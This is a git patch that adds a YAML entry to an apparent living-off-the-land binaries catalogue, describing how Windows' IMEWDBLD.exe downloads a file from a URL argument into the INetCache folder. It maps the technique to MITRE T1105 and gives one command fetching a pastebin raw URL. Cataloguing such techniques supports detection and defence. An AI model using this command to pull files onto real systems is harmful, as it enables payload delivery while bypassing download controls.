From 782bc68c7cb77073caf2fb0817fad31461cf9597 Mon Sep 17 00:00:00 2001
From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com>
Date: Fri, 5 Mar 2021 11:35:06 -0500
Subject: [PATCH] Create IMEWDBLD.yml

---
 yml/OSBinaries/IMEWDBLD.yml | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 yml/OSBinaries/IMEWDBLD.yml

diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml
new file mode 100644
index 0000000..e1167c1
--- /dev/null
+++ b/yml/OSBinaries/IMEWDBLD.yml
@@ -0,0 +1,22 @@
+---
+Name: IMEWDBLD.exe
+Description: Microsoft IME Open Extended Dictionary Module
+Author: 'Wade Hickey'
+Created: '2020-03-05'
+Commands:
+  - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
+    Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> 
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
+Resources:
+  - Link: https://twitter.com/notwhickey/status/1367493406835040265
+Acknowledgement:
+  - Person: Wade Hickey
+    Handle: '@notwhickey'
+---